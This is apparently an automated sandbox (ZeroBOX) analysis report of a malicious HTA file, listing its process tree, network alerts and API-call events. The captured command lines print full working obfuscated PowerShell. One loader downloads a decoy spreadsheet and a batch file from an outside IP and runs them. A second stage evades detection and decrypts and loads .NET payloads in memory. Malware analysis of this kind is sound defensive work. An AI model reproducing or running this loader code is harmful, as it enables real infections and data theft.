Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 9, 2024, 11 a.m.	May 9, 2024, 11:07 a.m.

Size	12.4KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`0864405d81d8ab37b43868a26748f57a`
SHA256	`d44fb61b57cf35e88313e28e776773d6038ad52204c61062c780a5fe6372e3d2`
CRC32	`E5094821`
ssdeep	`192:9OG0buVvwvLYQN2TfNZi/xNaWaQlfADwzl+LRAkfAbpMsoif/wfIDK7nzSjeY:9OGGZnu1tSjeY`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\5.hta
2576
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv;
  2668
  - EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
    2836
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\xD.bat" "
    3000
    - cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"
      2052
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
        1356
      - powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        2164
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
193.222.96.124	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 193.222.96.124:7287 -> 192.168.56.101:49168	2400036	ET DROP Spamhaus DROP Listed Traffic Inbound group 37	Misc Attack
TCP 192.168.56.101:49163 -> 193.222.96.124:7287	2027254	ET INFO Dotted Quad Host XLSX Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 11 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 9, 2024, 11 a.m.			0	0
IsDebuggerPresent May 9, 2024, 11 a.m.			0	0

Command line console output was observed (50 out of 58 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 9, 2024, 11 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: At line:1 char:701 console_handle: 0x00000053	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: + function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsH console_handle: 0x0000005f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: cHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @ console_handle: 0x0000006b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: (79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.E console_handle: 0x00000077	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: ndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell. console_handle: 0x00000083	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUum console_handle: 0x0000008f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: XNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv} console_handle: 0x0000009b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZ console_handle: 0x000000a7	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: zZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,7 console_handle: 0x000000b3	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: 9356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]:: <<<< Sec console_handle: 0x000000bf	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: urityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.Do console_handle: 0x000000cb	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: wnloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){ console_handle: 0x000000d7	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: $bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+ console_handle: 0x000000e3	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: =[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv() console_handle: 0x000000ef	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: {$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx'; console_handle: 0x000000fb	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi console_handle: 0x00000107	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79 console_handle: 0x00000113	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: 6,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$ console_handle: 0x00000137	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $ console_handle: 0x00000143	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79 console_handle: 0x0000014f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: 6,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;; console_handle: 0x00000173	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: ;}nvpRDaZuFdMv; console_handle: 0x0000017f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000018b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000197	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: At line:1 char:701 console_handle: 0x00000053	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: + function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsH console_handle: 0x0000005f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: cHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @ console_handle: 0x0000006b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: (79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.E console_handle: 0x00000077	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: ndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell. console_handle: 0x00000083	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUum console_handle: 0x0000008f	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: XNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv} console_handle: 0x0000009b	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZ console_handle: 0x000000a7	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: zZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,7 console_handle: 0x000000b3	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: 9356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]:: <<<< Sec console_handle: 0x000000bf	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: urityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.Do console_handle: 0x000000cb	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: wnloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){ console_handle: 0x000000d7	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: $bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+ console_handle: 0x000000e3	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: =[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv() console_handle: 0x000000ef	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: {$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx'; console_handle: 0x000000fb	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi console_handle: 0x00000107	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79 console_handle: 0x00000113	1	1
WriteConsoleW May 9, 2024, 11 a.m.	buffer: 6,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$ console_handle: 0x00000137	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f8ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f8ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f8ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f8ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f8aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f9728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ac138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004acef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 9, 2024, 11 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 322 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
